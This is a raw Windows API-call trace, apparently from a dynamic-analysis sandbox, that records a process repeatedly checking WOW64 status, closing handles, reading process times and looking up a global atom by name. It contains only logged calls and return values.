	[0131.430] CloseHandle (hObject=0x2dc) returned 1
	[0131.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.430] CloseHandle (hObject=0x2dc) returned 1
	[0131.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.430] CloseHandle (hObject=0x2dc) returned 1
	[0131.431] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.431] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.431] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.431] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.431] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.432] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.432] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.432] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.432] CloseHandle (hObject=0x2dc) returned 1
	[0131.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.432] CloseHandle (hObject=0x2dc) returned 1
	[0131.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.433] CloseHandle (hObject=0x2dc) returned 1
	[0131.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.433] CloseHandle (hObject=0x2dc) returned 1
	[0131.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.433] CloseHandle (hObject=0x2dc) returned 1
	[0131.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.433] CloseHandle (hObject=0x2dc) returned 1
	[0131.465] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.466] CloseHandle (hObject=0x2dc) returned 1
	[0131.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.466] CloseHandle (hObject=0x2dc) returned 1
	[0131.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.466] CloseHandle (hObject=0x2dc) returned 1
	[0131.466] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.466] CloseHandle (hObject=0x2dc) returned 1
	[0131.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.467] CloseHandle (hObject=0x2dc) returned 1
	[0131.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.467] CloseHandle (hObject=0x2dc) returned 1
	[0131.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.467] CloseHandle (hObject=0x2dc) returned 1
	[0131.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.467] CloseHandle (hObject=0x2dc) returned 1
	[0131.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.468] CloseHandle (hObject=0x2dc) returned 1
	[0131.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.468] CloseHandle (hObject=0x2dc) returned 1
	[0131.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.468] CloseHandle (hObject=0x2dc) returned 1
	[0131.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.468] CloseHandle (hObject=0x2dc) returned 1
	[0131.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.469] CloseHandle (hObject=0x2dc) returned 1
	[0131.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.469] CloseHandle (hObject=0x2dc) returned 1
	[0131.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.469] CloseHandle (hObject=0x2dc) returned 1
	[0131.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.469] CloseHandle (hObject=0x2dc) returned 1
	[0131.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.469] CloseHandle (hObject=0x2dc) returned 1
	[0131.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.470] CloseHandle (hObject=0x2dc) returned 1
	[0131.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.470] CloseHandle (hObject=0x2dc) returned 1
	[0131.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.470] CloseHandle (hObject=0x2dc) returned 1
	[0131.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.470] CloseHandle (hObject=0x2dc) returned 1
	[0131.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.471] CloseHandle (hObject=0x2dc) returned 1
	[0131.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.471] CloseHandle (hObject=0x2dc) returned 1
	[0131.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.471] CloseHandle (hObject=0x2dc) returned 1
	[0131.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.471] CloseHandle (hObject=0x2dc) returned 1
	[0131.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.472] CloseHandle (hObject=0x2dc) returned 1
	[0131.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.472] CloseHandle (hObject=0x2dc) returned 1
	[0131.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.472] CloseHandle (hObject=0x2dc) returned 1
	[0131.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.472] CloseHandle (hObject=0x2dc) returned 1
	[0131.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.472] CloseHandle (hObject=0x2dc) returned 1
	[0131.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.473] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.473] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.474] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.474] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.474] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.474] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.474] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.474] CloseHandle (hObject=0x2dc) returned 1
	[0131.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.474] CloseHandle (hObject=0x2dc) returned 1
	[0131.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.475] CloseHandle (hObject=0x2dc) returned 1
	[0131.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.475] CloseHandle (hObject=0x2dc) returned 1
	[0131.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.475] CloseHandle (hObject=0x2dc) returned 1
	[0131.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.475] CloseHandle (hObject=0x2dc) returned 1
	[0131.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.508] CloseHandle (hObject=0x2dc) returned 1
	[0131.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.508] CloseHandle (hObject=0x2dc) returned 1
	[0131.508] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.508] CloseHandle (hObject=0x2dc) returned 1
	[0131.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.509] CloseHandle (hObject=0x2dc) returned 1
	[0131.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.509] CloseHandle (hObject=0x2dc) returned 1
	[0131.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.509] CloseHandle (hObject=0x2dc) returned 1
	[0131.509] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.509] CloseHandle (hObject=0x2dc) returned 1
	[0131.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.510] CloseHandle (hObject=0x2dc) returned 1
	[0131.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.510] CloseHandle (hObject=0x2dc) returned 1
	[0131.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.510] CloseHandle (hObject=0x2dc) returned 1
	[0131.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.510] CloseHandle (hObject=0x2dc) returned 1
	[0131.510] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.510] CloseHandle (hObject=0x2dc) returned 1
	[0131.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.511] CloseHandle (hObject=0x2dc) returned 1
	[0131.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.511] CloseHandle (hObject=0x2dc) returned 1
	[0131.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.511] CloseHandle (hObject=0x2dc) returned 1
	[0131.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.511] CloseHandle (hObject=0x2dc) returned 1
	[0131.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.512] CloseHandle (hObject=0x2dc) returned 1
	[0131.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.512] CloseHandle (hObject=0x2dc) returned 1
	[0131.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.512] CloseHandle (hObject=0x2dc) returned 1
	[0131.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.512] CloseHandle (hObject=0x2dc) returned 1
	[0131.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.512] CloseHandle (hObject=0x2dc) returned 1
	[0131.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.513] CloseHandle (hObject=0x2dc) returned 1
	[0131.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.513] CloseHandle (hObject=0x2dc) returned 1
	[0131.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.513] CloseHandle (hObject=0x2dc) returned 1
	[0131.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.513] CloseHandle (hObject=0x2dc) returned 1
	[0131.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.514] CloseHandle (hObject=0x2dc) returned 1
	[0131.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.514] CloseHandle (hObject=0x2dc) returned 1
	[0131.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.514] CloseHandle (hObject=0x2dc) returned 1
	[0131.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.514] CloseHandle (hObject=0x2dc) returned 1
	[0131.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.515] CloseHandle (hObject=0x2dc) returned 1
	[0131.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.515] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.515] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.516] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.516] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.516] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.516] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.516] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.516] CloseHandle (hObject=0x2dc) returned 1
	[0131.516] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.517] CloseHandle (hObject=0x2dc) returned 1
	[0131.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.517] CloseHandle (hObject=0x2dc) returned 1
	[0131.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.517] CloseHandle (hObject=0x2dc) returned 1
	[0131.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.517] CloseHandle (hObject=0x2dc) returned 1
	[0131.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.517] CloseHandle (hObject=0x2dc) returned 1
	[0131.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.551] CloseHandle (hObject=0x2dc) returned 1
	[0131.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.551] CloseHandle (hObject=0x2dc) returned 1
	[0131.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.551] CloseHandle (hObject=0x2dc) returned 1
	[0131.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.551] CloseHandle (hObject=0x2dc) returned 1
	[0131.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.552] CloseHandle (hObject=0x2dc) returned 1
	[0131.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.552] CloseHandle (hObject=0x2dc) returned 1
	[0131.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.552] CloseHandle (hObject=0x2dc) returned 1
	[0131.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.552] CloseHandle (hObject=0x2dc) returned 1
	[0131.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.553] CloseHandle (hObject=0x2dc) returned 1
	[0131.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.553] CloseHandle (hObject=0x2dc) returned 1
	[0131.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.553] CloseHandle (hObject=0x2dc) returned 1
	[0131.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.553] CloseHandle (hObject=0x2dc) returned 1
	[0131.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.554] CloseHandle (hObject=0x2dc) returned 1
	[0131.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.554] CloseHandle (hObject=0x2dc) returned 1
	[0131.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.554] CloseHandle (hObject=0x2dc) returned 1
	[0131.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.554] CloseHandle (hObject=0x2dc) returned 1
	[0131.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.554] CloseHandle (hObject=0x2dc) returned 1
	[0131.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.555] CloseHandle (hObject=0x2dc) returned 1
	[0131.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.555] CloseHandle (hObject=0x2dc) returned 1
	[0131.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.555] CloseHandle (hObject=0x2dc) returned 1
	[0131.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.555] CloseHandle (hObject=0x2dc) returned 1
	[0131.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.556] CloseHandle (hObject=0x2dc) returned 1
	[0131.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.556] CloseHandle (hObject=0x2dc) returned 1
	[0131.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.556] CloseHandle (hObject=0x2dc) returned 1
	[0131.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.556] CloseHandle (hObject=0x2dc) returned 1
	[0131.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.556] CloseHandle (hObject=0x2dc) returned 1
	[0131.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.557] CloseHandle (hObject=0x2dc) returned 1
	[0131.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.557] CloseHandle (hObject=0x2dc) returned 1
	[0131.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.557] CloseHandle (hObject=0x2dc) returned 1
	[0131.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.557] CloseHandle (hObject=0x2dc) returned 1
	[0131.558] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.558] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.558] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.558] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.558] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.559] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.559] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.559] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.559] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.559] CloseHandle (hObject=0x2dc) returned 1
	[0131.559] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.559] CloseHandle (hObject=0x2dc) returned 1
	[0131.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.560] CloseHandle (hObject=0x2dc) returned 1
	[0131.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.560] CloseHandle (hObject=0x2dc) returned 1
	[0131.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.560] CloseHandle (hObject=0x2dc) returned 1
	[0131.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.560] CloseHandle (hObject=0x2dc) returned 1
	[0131.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.593] CloseHandle (hObject=0x2dc) returned 1
	[0131.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.593] CloseHandle (hObject=0x2dc) returned 1
	[0131.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.594] CloseHandle (hObject=0x2dc) returned 1
	[0131.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.594] CloseHandle (hObject=0x2dc) returned 1
	[0131.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.594] CloseHandle (hObject=0x2dc) returned 1
	[0131.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.594] CloseHandle (hObject=0x2dc) returned 1
	[0131.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.595] CloseHandle (hObject=0x2dc) returned 1
	[0131.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.595] CloseHandle (hObject=0x2dc) returned 1
	[0131.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.595] CloseHandle (hObject=0x2dc) returned 1
	[0131.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.595] CloseHandle (hObject=0x2dc) returned 1
	[0131.595] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.595] CloseHandle (hObject=0x2dc) returned 1
	[0131.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.596] CloseHandle (hObject=0x2dc) returned 1
	[0131.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.596] CloseHandle (hObject=0x2dc) returned 1
	[0131.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.596] CloseHandle (hObject=0x2dc) returned 1
	[0131.596] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.596] CloseHandle (hObject=0x2dc) returned 1
	[0131.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.597] CloseHandle (hObject=0x2dc) returned 1
	[0131.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.597] CloseHandle (hObject=0x2dc) returned 1
	[0131.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.597] CloseHandle (hObject=0x2dc) returned 1
	[0131.597] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.597] CloseHandle (hObject=0x2dc) returned 1
	[0131.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.598] CloseHandle (hObject=0x2dc) returned 1
	[0131.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.598] CloseHandle (hObject=0x2dc) returned 1
	[0131.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.598] CloseHandle (hObject=0x2dc) returned 1
	[0131.598] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
